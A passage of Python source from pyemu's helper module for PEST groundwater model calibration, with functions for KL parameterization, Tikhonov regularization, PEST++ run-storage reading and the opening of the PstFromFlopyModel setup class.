# #array -= array.mean()
# array_flat = pyemu.Matrix(x=np.atleast_2d(array.flatten()).transpose()
# ,col_names=["flat"],row_names=names,
# isdiagonal=False)
# factors = trunc_basis * array_flat
# enames = ["{0}{1:04d}".format(name,i) for i in range(num_eig)]
# for n,val in zip(enames,factors.x):
# f.write("{0},{1:20.8E},~ {0} ~\n".format(n,val[0]))
# back_array_dict[name] = (factors.T * trunc_basis).x.reshape(array.shape)
# print(array_back)
# print(factors.shape)
#
# return back_array_dict
def _eigen_basis_to_factor_file(nrow, ncol, basis, factors_file, islog=True):
assert nrow * ncol == basis.shape[0]
with open(factors_file, 'w') as f:
f.write("junk.dat\n")
f.write("junk.zone.dat\n")
f.write("{0} {1}\n".format(ncol, nrow))
f.write("{0}\n".format(basis.shape[1]))
[f.write(name + "\n") for name in basis.col_names]
t = 0
if islog:
t = 1
for i in range(nrow * ncol):
f.write("{0} {1} {2} {3:8.5e}".format(i + 1, t, basis.shape[1], 0.0))
[f.write(" {0} {1:12.8g} ".format(i + 1, w)) for i, w in enumerate(basis.x[i, :])]
f.write("\n")
def kl_apply(par_file, basis_file, par_to_file_dict, arr_shape):
""" Apply a KL parameterization transform from basis factors to model
input arrays.
Args:
par_file (`str`): the csv file to get factor values from. Must contain
the following columns: "name", "new_val", "org_val"
basis_file (`str`): the PEST-style binary file that contains the reduced
basis
par_to_file_dict (`dict`): a mapping from KL parameter prefixes to array
file names.
arr_shape (tuple): a length 2 tuple of number of rows and columns
the resulting arrays should have.
Note:
This is the companion function to kl_setup.
This function should be called during the forward run
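Example (hypothetical sketch; file names and the 50x100 array shape are illustrative)::
    par_to_file_dict = {"hk": "hk_layer_1.ref"}
    pyemu.helpers.kl_apply("hk.dat_kl", "kl_basis.jco",
                           par_to_file_dict, (50, 100))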
"""
df = pd.read_csv(par_file)
assert "name" in df.columns
assert "org_val" in df.columns
assert "new_val" in df.columns
df.loc[:, "prefix"] = df.name.apply(lambda x: x[:-4])
for prefix in df.prefix.unique():
assert prefix in par_to_file_dict.keys(), "missing prefix:{0}". \
format(prefix)
basis = pyemu.Matrix.from_binary(basis_file)
assert basis.shape[1] == arr_shape[0] * arr_shape[1]
arr_min = 1.0e-10 # a temp hack
# means = df.loc[df.name.apply(lambda x: x.endswith("mean")),:]
# print(means)
df = df.loc[df.name.apply(lambda x: not x.endswith("mean")), :]
for prefix, filename in par_to_file_dict.items():
factors = pyemu.Matrix.from_dataframe(df.loc[df.prefix == prefix, ["new_val"]])
factors.autoalign = False
basis_prefix = basis[:factors.shape[0], :]
arr = (factors.T * basis_prefix).x.reshape(arr_shape)
# arr += means.loc[means.prefix==prefix,"new_val"].values
arr[arr < arr_min] = arr_min
np.savetxt(filename, arr, fmt="%20.8E")
def zero_order_tikhonov(pst, parbounds=True, par_groups=None,
reset=True):
"""setup preferred-value regularization in a pest control file.
Args:
pst (`pyemu.Pst`): the control file instance
parbounds (`bool`, optional): flag to weight the new prior information
equations according to parameter bound width - approx the KL
transform. Default is True
par_groups (`list`): a list of parameter groups to build PI equations for.
If None, all adjustable parameters are used. Default is None
reset (`bool`): a flag to remove any existing prior information equations
in the control file. Default is True
Example::
pst = pyemu.Pst("my.pst")
pyemu.helpers.zero_order_tikhonov(pst)
pst.write("my_reg.pst")
"""
if par_groups is None:
par_groups = pst.par_groups
pilbl, obgnme, weight, equation = [], [], [], []
for idx, row in pst.parameter_data.iterrows():
pt = row["partrans"].lower()
try:
pt = pt.decode()
except:
pass
if pt not in ["tied", "fixed"] and \
row["pargp"] in par_groups:
pilbl.append(row["parnme"])
weight.append(1.0)
ogp_name = "regul" + row["pargp"]
obgnme.append(ogp_name[:12])
parnme = row["parnme"]
parval1 = row["parval1"]
if pt == "log":
parnme = "log(" + parnme + ")"
parval1 = np.log10(parval1)
eq = "1.0 * " + parnme + " ={0:15.6E}".format(parval1)
equation.append(eq)
if reset:
pst.prior_information = pd.DataFrame({"pilbl": pilbl,
"equation": equation,
"obgnme": obgnme,
"weight": weight})
else:
pi = pd.DataFrame({"pilbl": pilbl,
"equation": equation,
"obgnme": obgnme,
"weight": weight})
pst.prior_information = pst.prior_information.append(pi)
if parbounds:
_regweight_from_parbound(pst)
if pst.control_data.pestmode == "estimation":
pst.control_data.pestmode = "regularization"
def _regweight_from_parbound(pst):
"""sets regularization weights from parameter bounds
which approximates the KL expansion. Called by
zero_order_tikhonov().
"""
pst.parameter_data.index = pst.parameter_data.parnme
pst.prior_information.index = pst.prior_information.pilbl
for idx, parnme in enumerate(pst.prior_information.pilbl):
if parnme in pst.parameter_data.index:
row = pst.parameter_data.loc[parnme, :]
lbnd, ubnd = row["parlbnd"], row["parubnd"]
if row["partrans"].lower() == "log":
weight = 1.0 / (np.log10(ubnd) - np.log10(lbnd))
else:
weight = 1.0 / (ubnd - lbnd)
pst.prior_information.loc[parnme, "weight"] = weight
else:
print("prior information name does not correspond" + \
" to a parameter: " + str(parnme))
def first_order_pearson_tikhonov(pst, cov, reset=True, abs_drop_tol=1.0e-3):
"""setup preferred-difference regularization from a covariance matrix.
Args:
pst (`pyemu.Pst`): the PEST control file
cov (`pyemu.Cov`): a covariance matrix instance with
some or all of the parameters listed in `pst`.
reset (`bool`): a flag to remove any existing prior information equations
in the control file. Default is True
abs_drop_tol (`float`, optional): tolerance to control how many pi equations
are written. If the absolute value of the Pearson CC is less than
abs_drop_tol, the prior information equation will not be included in
the control file.
Note:
The weights on the prior information equations are the Pearson
correlation coefficients implied by covariance matrix.
Example::
pst = pyemu.Pst("my.pst")
cov = pyemu.Cov.from_ascii("my.cov")
pyemu.helpers.first_order_pearson_tikhonov(pst,cov)
pst.write("my_reg.pst")
"""
assert isinstance(cov, pyemu.Cov)
print("getting CC matrix")
cc_mat = cov.to_pearson()
# print(pst.parameter_data.dtypes)
try:
ptrans = pst.parameter_data.partrans.apply(lambda x: x.decode()).to_dict()
except:
ptrans = pst.parameter_data.partrans.to_dict()
pi_num = pst.prior_information.shape[0] + 1
pilbl, obgnme, weight, equation = [], [], [], []
sadj_names = set(pst.adj_par_names)
print("processing")
for i, iname in enumerate(cc_mat.row_names):
if iname not in sadj_names:
continue
for j, jname in enumerate(cc_mat.row_names[i + 1:]):
if jname not in sadj_names:
continue
# print(i,iname,i+j+1,jname)
cc = cc_mat.x[i, j + i + 1]
if cc < abs_drop_tol:
continue
pilbl.append("pcc_{0}".format(pi_num))
iiname = str(iname)
if str(ptrans[iname]) == "log":
iiname = "log(" + iname + ")"
jjname = str(jname)
if str(ptrans[jname]) == "log":
jjname = "log(" + jname + ")"
equation.append("1.0 * {0} - 1.0 * {1} = 0.0". \
format(iiname, jjname))
weight.append(cc)
obgnme.append("regul_cc")
pi_num += 1
df = pd.DataFrame({"pilbl": pilbl, "equation": equation,
"obgnme": obgnme, "weight": weight})
df.index = df.pilbl
if reset:
pst.prior_information = df
else:
pst.prior_information = pst.prior_information.append(df)
if pst.control_data.pestmode == "estimation":
pst.control_data.pestmode = "regularization"
def simple_tpl_from_pars(parnames, tplfilename='model.input.tpl'):
"""Make a simple template file from a list of parameter names.
Args:
parnames ([`str`]): list of parameter names to put in the
new template file
tplfilename (`str`): Name of the template file to create. Default
is "model.input.tpl"
Note:
writes a file `tplfilename` with each parameter name in `parnames` on a line
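Example (parameter names are illustrative)::
    pyemu.helpers.simple_tpl_from_pars(["par1", "par2"], "model.input.tpl")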
"""
with open(tplfilename, 'w') as ofp:
ofp.write('ptf ~\n')
[ofp.write('~{0:^12}~\n'.format(cname)) for cname in parnames]
def simple_ins_from_obs(obsnames, insfilename='model.output.ins'):
"""write a simple instruction file that reads the values named
in obsnames in order, one per line from a model output file
Args:
obsnames (`str`): list of observation names to put in the
new instruction file
insfilename (`str`): the name of the instruction file to
create. Default is "model.output.ins"
Note:
writes a file `insfilename` with each observation read off
of a single line
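Example (observation names are illustrative)::
    pyemu.helpers.simple_ins_from_obs(["obs1", "obs2"], "model.output.ins")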
"""
with open(insfilename, 'w') as ofp:
ofp.write('pif ~\n')
[ofp.write('!{0}!\n'.format(cob)) for cob in obsnames]
def pst_from_parnames_obsnames(parnames, obsnames,
tplfilename='model.input.tpl', insfilename='model.output.ins'):
"""Creates a Pst object from a list of parameter names and a list of observation names.
Args:
parnames (`str`): list of parameter names
obsnames (`str`): list of observation names
tplfilename (`str`): template filename. Default is "model.input.tpl"
insfilename (`str`): instruction filename. Default is "model.output.ins"
Returns:
`pyemu.Pst`: the generic control file
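Example (names are illustrative)::
    pst = pyemu.helpers.pst_from_parnames_obsnames(
        ["par1", "par2"], ["obs1", "obs2"])
    pst.write("generic.pst")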
"""
simple_tpl_from_pars(parnames, tplfilename)
simple_ins_from_obs(obsnames, insfilename)
modelinputfilename = tplfilename.replace('.tpl', '')
modeloutputfilename = insfilename.replace('.ins', '')
return pyemu.Pst.from_io_files(tplfilename, modelinputfilename, insfilename, modeloutputfilename)
def read_pestpp_runstorage(filename, irun=0, with_metadata=False):
"""read pars and obs from a specific run in a pest++ serialized
run storage file into dataframes.
Args:
filename (`str`): the name of the run storage file
irun (`int`): the run id to process. If 'all', then all runs are
read. Default is 0
with_metadata (`bool`): flag to return run stats and info txt as well
Returns:
tuple containing
- **pandas.DataFrame**: parameter information
- **pandas.DataFrame**: observation information
- **pandas.DataFrame**: optionally run status and info txt.
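Example (hypothetical file name)::
    par_df, obs_df = pyemu.helpers.read_pestpp_runstorage("pest.rns", irun=0)
    par_df, obs_df, meta = pyemu.helpers.read_pestpp_runstorage(
        "pest.rns", irun="all", with_metadata=True)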
"""
header_dtype = np.dtype([("n_runs", np.int64), ("run_size", np.int64), ("p_name_size", np.int64),
("o_name_size", np.int64)])
try:
irun = int(irun)
except:
if irun.lower() == "all":
irun = irun.lower()
else:
raise Exception("unrecognized 'irun': should be int or 'all', not '{0}'".
format(irun))
def status_str(r_status):
if r_status == 0:
return "not completed"
if r_status == 1:
return "completed"
if r_status == -100:
return "canceled"
else:
return "failed"
assert os.path.exists(filename)
f = open(filename, "rb")
header = np.fromfile(f, dtype=header_dtype, count=1)
p_name_size, o_name_size = header["p_name_size"][0], header["o_name_size"][0]
par_names = struct.unpack('{0}s'.format(p_name_size),
f.read(p_name_size))[0].strip().lower().decode().split('\0')[:-1]
obs_names = struct.unpack('{0}s'.format(o_name_size),
f.read(o_name_size))[0].strip().lower().decode().split('\0')[:-1]
n_runs, run_size = header["n_runs"][0], header["run_size"][0]
run_start = f.tell()
def _read_run(irun):
f.seek(run_start + (irun * run_size))
r_status = np.fromfile(f, dtype=np.int8, count=1)
info_txt = struct.unpack("41s", f.read(41))[0].strip().lower().decode()
par_vals = np.fromfile(f, dtype=np.float64, count=len(par_names) + 1)[1:]
obs_vals = np.fromfile(f, dtype=np.float64, count=len(obs_names) + 1)[:-1]
par_df = pd.DataFrame({"parnme": par_names, "parval1": par_vals})
par_df.index = par_df.pop("parnme")
obs_df = pd.DataFrame({"obsnme": obs_names, "obsval": obs_vals})
obs_df.index = obs_df.pop("obsnme")
return r_status, info_txt, par_df, obs_df
if irun == "all":
par_dfs, obs_dfs = [], []
r_stats, txts = [], []
for irun in range(n_runs):
# print(irun)
r_status, info_txt, par_df, obs_df = _read_run(irun)
par_dfs.append(par_df)
obs_dfs.append(obs_df)
r_stats.append(r_status)
txts.append(info_txt)
par_df = pd.concat(par_dfs, axis=1).T
par_df.index = np.arange(n_runs)
obs_df = pd.concat(obs_dfs, axis=1).T
obs_df.index = np.arange(n_runs)
meta_data = pd.DataFrame({"r_status": r_stats, "info_txt": txts})
meta_data.loc[:, "status"] = meta_data.r_status.apply(status_str)
else:
assert irun <= n_runs
r_status, info_txt, par_df, obs_df = _read_run(irun)
meta_data = pd.DataFrame({"r_status": [r_status], "info_txt": [info_txt]})
meta_data.loc[:, "status"] = meta_data.r_status.apply(status_str)
f.close()
if with_metadata:
return par_df, obs_df, meta_data
else:
return par_df, obs_df
def jco_from_pestpp_runstorage(rnj_filename, pst_filename):
""" read pars and obs from a pest++ serialized run storage
file (e.g., .rnj) and return jacobian matrix instance
Args:
rnj_filename (`str`): the name of the run storage file
pst_filename (`str`): the name of the pst file
Note:
This can then be passed to Jco.to_binary or Jco.to_coo, etc., to write jco
file in a subsequent step to avoid memory resource issues associated
with very large problems.
Returns:
`pyemu.Jco`: a jacobian matrix constructed from the run results and
pest control file information.
TODO:
Check rnj file contains transformed par vals (i.e., in model input space)
Currently only returns pyemu.Jco; doesn't write jco file due to memory
issues associated with very large problems
Compare rnj and jco from Freyberg problem in autotests
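Example (hypothetical file names)::
    jco = pyemu.helpers.jco_from_pestpp_runstorage("my.rnj", "my.pst")
    jco.to_binary("my.jco")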
"""
header_dtype = np.dtype([("n_runs", np.int64), ("run_size", np.int64), ("p_name_size", np.int64),
("o_name_size", np.int64)])
pst = pyemu.Pst(pst_filename)
par = pst.parameter_data
log_pars = set(par.loc[par.partrans == "log", "parnme"].values)
with open(rnj_filename, 'rb') as f:
header = np.fromfile(f, dtype=header_dtype, count=1)
try:
base_par, base_obs = read_pestpp_runstorage(rnj_filename, irun=0)
except:
raise Exception("couldn't get base run...")
par = par.loc[base_par.index, :]
li = base_par.index.map(lambda x: par.loc[x, "partrans"] == "log")
base_par.loc[li] = base_par.loc[li].apply(np.log10)
jco_cols = {}
for irun in range(1, int(header["n_runs"])):
par_df, obs_df = read_pestpp_runstorage(rnj_filename, irun=irun)
par_df.loc[li] = par_df.loc[li].apply(np.log10)
obs_diff = base_obs - obs_df
par_diff = base_par - par_df
# check only one non-zero element per col(par)
if len(par_diff[par_diff.parval1 != 0]) > 1:
raise Exception("more than one par diff - looks like the file wasn't created during jco filling...")
parnme = par_diff[par_diff.parval1 != 0].index[0]
parval = par_diff.parval1.loc[parnme]
# derivatives
jco_col = obs_diff / parval
# some tracking, checks
print("processing par {0}: {1}...".format(irun, parnme))
print("%nzsens: {0}%...".format((jco_col[abs(jco_col.obsval) > 1e-8].shape[0] / jco_col.shape[0]) * 100.))
jco_cols[parnme] = jco_col.obsval
jco_cols = pd.DataFrame.from_records(data=jco_cols, index=list(obs_diff.index.values))
jco_cols = pyemu.Jco.from_dataframe(jco_cols)
# write # memory considerations important here for very large matrices - break into chunks...
# jco_fnam = "{0}".format(filename[:-4]+".jco")
# jco_cols.to_binary(filename=jco_fnam, droptol=None, chunk=None)
return jco_cols
def parse_dir_for_io_files(d,prepend_path=False):
""" find template/input file pairs and instruction file/output file
pairs by extension.
Args:
d (`str`): directory to search for interface files
prepend_path (`bool`, optional): flag to prepend `d` to each file name.
Default is False
Note:
the return values from this function can be passed straight to
`pyemu.Pst.from_io_files()` classmethod constructor. Assumes the
template file names are <input_file>.tpl and instruction file names
are <output_file>.ins.
Returns:
tuple containing
- **[`str`]**: list of template files in d
- **[`str`]**: list of input files in d
- **[`str`]**: list of instruction files in d
- **[`str`]**: list of output files in d
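Example (directory name is illustrative)::
    tpl_files, in_files, ins_files, out_files = \
        pyemu.helpers.parse_dir_for_io_files("template", prepend_path=True)
    pst = pyemu.Pst.from_io_files(tpl_files, in_files, ins_files, out_files)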
"""
files = os.listdir(d)
tpl_files = [f for f in files if f.endswith(".tpl")]
in_files = [f.replace(".tpl", "") for f in tpl_files]
ins_files = [f for f in files if f.endswith(".ins")]
out_files = [f.replace(".ins", "") for f in ins_files]
if prepend_path:
tpl_files = [os.path.join(d,item) for item in tpl_files]
in_files = [os.path.join(d, item) for item in in_files]
ins_files = [os.path.join(d, item) for item in ins_files]
out_files = [os.path.join(d, item) for item in out_files]
return tpl_files, in_files, ins_files, out_files
def pst_from_io_files(tpl_files, in_files, ins_files, out_files,
pst_filename=None, pst_path=None):
""" create a Pst instance from model interface files.
Args:
tpl_files ([`str`]): list of template file names
in_files ([`str`]): list of model input file names (pairs with template files)
ins_files ([`str`]): list of instruction file names
out_files ([`str`]): list of model output file names (pairs with instruction files)
pst_filename (`str`): name of control file to write. If None, no file is written.
Default is None
pst_path (`str`): the path to append to the template_file and in_file in the control file. If
not None, then any existing path in front of the template or in file is split off
and pst_path is prepended. If python is being run in a directory other than where the control
file will reside, it is useful to pass `pst_path` as `.`. Default is None
Returns:
`Pst`: new control file instance with parameter and observation names
found in `tpl_files` and `ins_files`, respectively.
Note:
calls `pyemu.helpers.pst_from_io_files()`
Assigns generic values for parameter info. Tries to use INSCHEK
to set somewhat meaningful observation values.
All file paths are relative to where python is running.
TODO:
add pst_path option
make in_files and out_files optional
Example::
tpl_files = ["my.tpl"]
in_files = ["my.in"]
ins_files = ["my.ins"]
out_files = ["my.out"]
pst = pyemu.Pst.from_io_files(tpl_files,in_files,ins_files,out_files)
pst.control_data.noptmax = 0
pst.write("my.pst)
"""
par_names = set()
if not isinstance(tpl_files, list):
tpl_files = [tpl_files]
if not isinstance(in_files, list):
in_files = [in_files]
assert len(in_files) == len(tpl_files), "len(in_files) != len(tpl_files)"
for tpl_file in tpl_files:
assert os.path.exists(tpl_file), "template file not found: " + str(tpl_file)
# new_names = [name for name in pyemu.pst_utils.parse_tpl_file(tpl_file) if name not in par_names]
# par_names.extend(new_names)
new_names = pyemu.pst_utils.parse_tpl_file(tpl_file)
par_names.update(new_names)
if not isinstance(ins_files, list):
ins_files = [ins_files]
if not isinstance(out_files, list):
out_files = [out_files]
assert len(ins_files) == len(out_files), "len(ins_files) != len(out_files)"
obs_names = []
for ins_file in ins_files:
assert os.path.exists(ins_file), "instruction file not found: " + str(ins_file)
obs_names.extend(pyemu.pst_utils.parse_ins_file(ins_file))
new_pst = pyemu.pst_utils.generic_pst(list(par_names), list(obs_names))
if "window" in platform.platform().lower() and pst_path == ".":
pst_path = ''
new_pst.instruction_files = ins_files
new_pst.output_files = out_files
    # try to run inschek to find the observation values
pyemu.pst_utils.try_process_output_pst(new_pst)
if pst_path is None:
new_pst.template_files = tpl_files
new_pst.input_files = in_files
else:
new_pst.template_files = [os.path.join(
pst_path, os.path.split(tpl_file)[-1]) for tpl_file in tpl_files]
new_pst.input_files = [os.path.join(
pst_path, os.path.split(in_file)[-1]) for in_file in in_files]
# now set the true path location to instruction files and output files
new_pst.instruction_files = [os.path.join(
pst_path, os.path.split(ins_file)[-1]) for ins_file in ins_files]
new_pst.output_files = [os.path.join(
pst_path, os.path.split(out_file)[-1]) for out_file in out_files]
new_pst.try_parse_name_metadata()
if pst_filename:
new_pst.write(pst_filename)
return new_pst
wildass_guess_par_bounds_dict = {"hk": [0.01, 100.0], "vka": [0.1, 10.0],
"sy": [0.25, 1.75], "ss": [0.1, 10.0],
"cond": [0.01, 100.0], "flux": [0.25, 1.75],
"rech": [0.9, 1.1], "stage": [0.9, 1.1],
}
class PstFromFlopyModel(object):
""" a monster helper class to setup a complex PEST interface around
an existing MODFLOW-2005-family model.
Args:
model (`flopy.mbase`): a loaded flopy model instance. If model is an str, it is treated as a
MODFLOW nam file (requires org_model_ws)
new_model_ws (`str`): a directory where the new version of MODFLOW input files and PEST(++)
files will be written
org_model_ws (`str`): directory to existing MODFLOW model files. Required if model argument
is an str. Default is None
pp_props ([[`str`,[`int`]]]): pilot point multiplier parameters for grid-based properties.
A nested list of grid-scale model properties to parameterize using
name, iterable pairs. For 3D properties, the iterable is zero-based
layer indices. For example, ["lpf.hk",[0,1,2,]] would setup pilot point multiplier
parameters for layer property file horizontal hydraulic conductivity for model
layers 1,2, and 3. For time-varying properties (e.g. recharge), the
iterable is for zero-based stress period indices. For example, ["rch.rech",[0,4,10,15]]
would setup pilot point multiplier parameters for recharge for stress
period 1,5,11,and 16.
const_props ([[`str`,[`int`]]]): constant (uniform) multiplier parameters for grid-based properties.
A nested list of grid-scale model properties to parameterize using
name, iterable pairs. For 3D properties, the iterable is zero-based
layer indices. For example, ["lpf.hk",[0,1,2,]] would setup constant (uniform) multiplier
parameters for layer property file horizontal hydraulic conductivity for model
layers 1,2, and 3. For time-varying properties (e.g. recharge), the
iterable is for zero-based stress period indices. For example, ["rch.rech",[0,4,10,15]]
would setup constant (uniform) multiplier parameters for recharge for stress
period 1,5,11,and 16.
temporal_list_props ([[`str`,[`int`]]]): list-type input stress-period level multiplier parameters.
A nested list of list-type input elements to parameterize using
name, iterable pairs. The iterable is zero-based stress-period indices.
For example, to setup multipliers for WEL flux and for RIV conductance,
temporal_list_props = [["wel.flux",[0,1,2]],["riv.cond",None]] would setup
multiplier parameters for well flux for stress periods 1,2 and 3 and
would setup one single river conductance multiplier parameter that is applied
to all stress periods
spatial_list_props ([[`str`,[`int`]]]): list-type input for spatial multiplier parameters.
A nested list of list-type elements to parameterize using
            names (e.g. [["riv.cond",0],["wel.flux",1]]) to set up cell-based parameters for
each list-type element listed. These multiplier parameters are applied across
all stress periods. For this to work, there must be the same number of entries
for all stress periods. If more than one list element of the same type is in a single
cell, only one parameter is used to multiply all lists in the same cell.
grid_props ([[`str`,[`int`]]]): grid-based (every active model cell) multiplier parameters.
A nested list of grid-scale model properties to parameterize using
name, iterable pairs. For 3D properties, the iterable is zero-based
layer indices (e.g., ["lpf.hk",[0,1,2,]] would setup a multiplier
parameter for layer property file horizontal hydraulic conductivity for model
layers 1,2, and 3 in every active model cell). For time-varying properties (e.g. recharge), the
iterable is for zero-based stress period indices. For example, ["rch.rech",[0,4,10,15]]
would setup grid-based multiplier parameters in every active model cell
for recharge for stress period 1,5,11,and 16.
        sfr_pars (`bool`): setup parameters for the stream flow routing modflow package.
            If a list is passed, it defines the parameters to set up.
        temporal_sfr_pars (`bool`): flag to include stress-period level spatially-global multiplier parameters in addition to
            the spatially-discrete `sfr_pars`. Requires `sfr_pars` to be passed. Default is False
grid_geostruct (`pyemu.geostats.GeoStruct`): the geostatistical structure to build the prior parameter covariance matrix
elements for grid-based parameters. If None, a generic GeoStruct is created
using an "a" parameter that is 10 times the max cell size. Default is None
pp_space (`int`): number of grid cells between pilot points. If None, use the default
            in pyemu.pp_utils.setup_pilotpoints_grid. Default is None
zone_props ([[`str`,[`int`]]]): zone-based multiplier parameters.
A nested list of zone-based model properties to parameterize using
name, iterable pairs. For 3D properties, the iterable is zero-based
layer indices (e.g., ["lpf.hk",[0,1,2,]] would setup a multiplier
parameter for layer property file horizontal hydraulic conductivity for model
            layers 1,2, and 3 for unique zone values in the ibound array).
For time-varying properties (e.g. recharge), the iterable is for
zero-based stress period indices. For example, ["rch.rech",[0,4,10,15]]
would setup zone-based multiplier parameters for recharge for stress
period 1,5,11,and 16.
pp_geostruct (`pyemu.geostats.GeoStruct`): the geostatistical structure to use for building the prior parameter
covariance matrix for pilot point parameters. If None, a generic
GeoStruct is created using pp_space and grid-spacing information.
Default is None
par_bounds_dict (`dict`): a dictionary of model property/boundary condition name, upper-lower bound pairs.
For example, par_bounds_dict = {"hk":[0.01,100.0],"flux":[0.5,2.0]} would
set the bounds for horizontal hydraulic conductivity to
            0.01 and 100.0 and set the bounds for flux parameters to 0.5 and
2.0. For parameters not found in par_bounds_dict,
`pyemu.helpers.wildass_guess_par_bounds_dict` is
used to set somewhat meaningful bounds. Default is None
        temporal_list_geostruct (`pyemu.geostats.GeoStruct`): the geostatistical structure to
build the prior parameter covariance matrix
for time-varying list-type multiplier parameters. This GeoStruct
            expresses the time correlation so that the 'a' parameter is the length of
time that boundary condition multiplier parameters are correlated across.
If None, then a generic GeoStruct is created that uses an 'a' parameter
of 3 stress periods. Default is None
        spatial_list_geostruct (`pyemu.geostats.GeoStruct`): the geostatistical structure to
build the prior parameter covariance matrix
for spatially-varying list-type multiplier parameters.
If None, a generic GeoStruct is created using an "a" parameter that
is 10 times the max cell size. Default is None.
remove_existing (`bool`): a flag to remove an existing new_model_ws directory. If False and
new_model_ws exists, an exception is raised. If True and new_model_ws
exists, the directory is destroyed - user beware! Default is False.
k_zone_dict (`dict`): a dictionary of zero-based layer index, zone array pairs.
            e.g. {lay: np.ndarray}. Used to
override using ibound zones for zone-based parameterization. If None,
use ibound values greater than zero as zones. Alternatively a dictionary of dictionaries
can be passed to allow different zones to be defined for different parameters.
            e.g. {"upw.hk": {lay: np.ndarray}, "extra.rc11": {lay: np.ndarray}}
            or {"hk": {lay: np.ndarray}, "rc11": {lay: np.ndarray}}
use_pp_zones (`bool`): a flag to use ibound zones (or k_zone_dict, see above) as pilot
point zones. If False, ibound values greater than zero are treated as
a single zone for pilot points. Default is False
        obssim_smp_pairs ([[`str`,`str`]]): a list of observed-simulated PEST-type SMP file
pairs to get observations
from and include in the control file. Default is []
        external_tpl_in_pairs ([[`str`,`str`]]): a list of existing template file, model input
file pairs to parse parameters
from and include in the control file. Default is []
        external_ins_out_pairs ([[`str`,`str`]]): a list of existing instruction file,
model output file pairs to parse
observations from and include in the control file. Default is []
extra_pre_cmds ([`str`]): a list of preprocessing commands to add to the forward_run.py script
commands are executed with os.system() within forward_run.py. Default is None.
redirect_forward_output (`bool`): flag for whether to redirect forward model output to text files (True) or
allow model output to be directed to the screen (False). Default is True
extra_post_cmds ([`str`]): a list of post-processing commands to add to the forward_run.py script.
Commands are executed with os.system() within forward_run.py. Default is None.
tmp_files ([`str`]): a list of temporary files that should be removed at the start of the forward
run script. Default is [].
model_exe_name (`str`): binary name to run modflow. If None, a default from flopy is used,
which is dangerous because of the non-standard binary names
(e.g. MODFLOW-NWT_x64, MODFLOWNWT, mfnwt, etc). Default is None.
build_prior (`bool`): flag to build prior covariance matrix. Default is True
sfr_obs (`bool`): flag to include observations of flow and aquifer exchange from
the sfr ASCII output file
hfb_pars (`bool`): add HFB parameters. uses pyemu.gw_utils.write_hfb_template(). the resulting
HFB pars have parval1 equal to the values in the original file and use the
            spatial_list_geostruct to build geostatistical covariances between parameters
        kl_props ([[`str`,[`int`]]]): Karhunen-Loeve based multiplier parameters.
A nested list of KL-based model properties to parameterize using
name, iterable pairs. For 3D properties, the iterable is zero-based
layer indices (e.g., ["lpf.hk",[0,1,2,]] would setup a multiplier
parameter for layer property file horizontal hydraulic conductivity for model
            layers 1,2, and 3 for unique zone values in the ibound array).
For time-varying properties (e.g. recharge), the iterable is for
zero-based stress period indices. For example, ["rch.rech",[0,4,10,15]]
would setup zone-based multiplier parameters for recharge for stress
period 1,5,11,and 16.
kl_num_eig (`int`): the number of KL-based eigenvector multiplier parameters to use for each
KL parameter set. default is 100
        kl_geostruct (`pyemu.geostats.GeoStruct`): the geostatistical structure
to build the prior parameter covariance matrix
elements for KL-based parameters. If None, a generic GeoStruct is created
using an "a" parameter that is 10 times the max cell size. Default is None
Note:
        Sets up multiplier parameters for an existing MODFLOW model.
        Does all kinds of coolness like building a
        meaningful prior, assigning somewhat meaningful parameter groups and
        bounds, and writing a forward_run.py script with all the calls needed to
        implement multiplier parameters, run MODFLOW and post-process.
Works a lot better if TEMPCHEK, INSCHEK and PESTCHEK are available in the
system path variable
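    Example (a minimal sketch; the nam file, workspace names and parameterization choices are illustrative)::
        ph = pyemu.helpers.PstFromFlopyModel("my.nam", new_model_ws="template",
                                             org_model_ws="original",
                                             pp_props=[["upw.hk", [0, 1, 2]]],
                                             temporal_list_props=[["wel.flux", None]],
                                             remove_existing=True)
        pst = ph.pst
        pst.control_data.noptmax = 0
        pst.write(os.path.join("template", ph.pst_name))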
"""
def __init__(self, model, new_model_ws, org_model_ws=None, pp_props=[], const_props=[],
temporal_bc_props=[], temporal_list_props=[], grid_props=[],
grid_geostruct=None, pp_space=None,
zone_props=[], pp_geostruct=None, par_bounds_dict=None, sfr_pars=False, temporal_sfr_pars=False,
temporal_list_geostruct=None, remove_existing=False, k_zone_dict=None,
mflist_waterbudget=True, mfhyd=True, hds_kperk=[], use_pp_zones=False,
obssim_smp_pairs=None, external_tpl_in_pairs=None,
external_ins_out_pairs=None, extra_pre_cmds=None,
extra_model_cmds=None, extra_post_cmds=None, redirect_forward_output=True,
tmp_files=None, model_exe_name=None, build_prior=True,
sfr_obs=False,
spatial_bc_props=[], spatial_list_props=[], spatial_list_geostruct=None,
hfb_pars=False, kl_props=None, kl_num_eig=100, kl_geostruct=None):
self.logger = pyemu.logger.Logger("PstFromFlopyModel.log")
self.log = self.logger.log
self.logger.echo = True
self.zn_suffix = "_zn"
self.gr_suffix = "_gr"
self.pp_suffix = "_pp"
self.cn_suffix = "_cn"
self.kl_suffix = "_kl"
self.arr_org = "arr_org"
self.arr_mlt = "arr_mlt"
self.list_org = "list_org"
self.list_mlt = "list_mlt"
self.forward_run_file = "forward_run.py"
self.remove_existing = remove_existing
self.external_tpl_in_pairs = external_tpl_in_pairs
self.external_ins_out_pairs = external_ins_out_pairs
self._setup_model(model, org_model_ws, new_model_ws)
self._add_external()
self.arr_mult_dfs = []
self.par_bounds_dict = par_bounds_dict
self.pp_props = pp_props
self.pp_space = pp_space
self.pp_geostruct = pp_geostruct
self.use_pp_zones = use_pp_zones
self.const_props = const_props
self.grid_props = grid_props
self.grid_geostruct = grid_geostruct
self.zone_props = zone_props
self.kl_props = kl_props
self.kl_geostruct = kl_geostruct
self.kl_num_eig = kl_num_eig
if len(temporal_bc_props) > 0:
if len(temporal_list_props) > 0:
                self.logger.lraise("both temporal_bc_props and temporal_list_props passed. " + \
                                   "temporal_bc_props is deprecated and replaced by temporal_list_props")
self.logger.warn("temporal_bc_props is deprecated and replaced by temporal_list_props")
temporal_list_props = temporal_bc_props
if len(spatial_bc_props) > 0:
if len(spatial_list_props) > 0:
                self.logger.lraise("both spatial_bc_props and spatial_list_props passed. " + \
                                   "spatial_bc_props is deprecated and replaced by spatial_list_props")
self.logger.warn("spatial_bc_props is deprecated and replaced by spatial_list_props")
spatial_list_props = spatial_bc_props
self.temporal_list_props = temporal_list_props
self.temporal_list_geostruct = temporal_list_geostruct
if self.temporal_list_geostruct is None:
            v = pyemu.geostats.ExpVario(contribution=1.0, a=180.0)  # correlation length ('a') of 180 days
self.temporal_list_geostruct = pyemu.geostats.GeoStruct(variograms=v, name="temporal_list_geostruct")
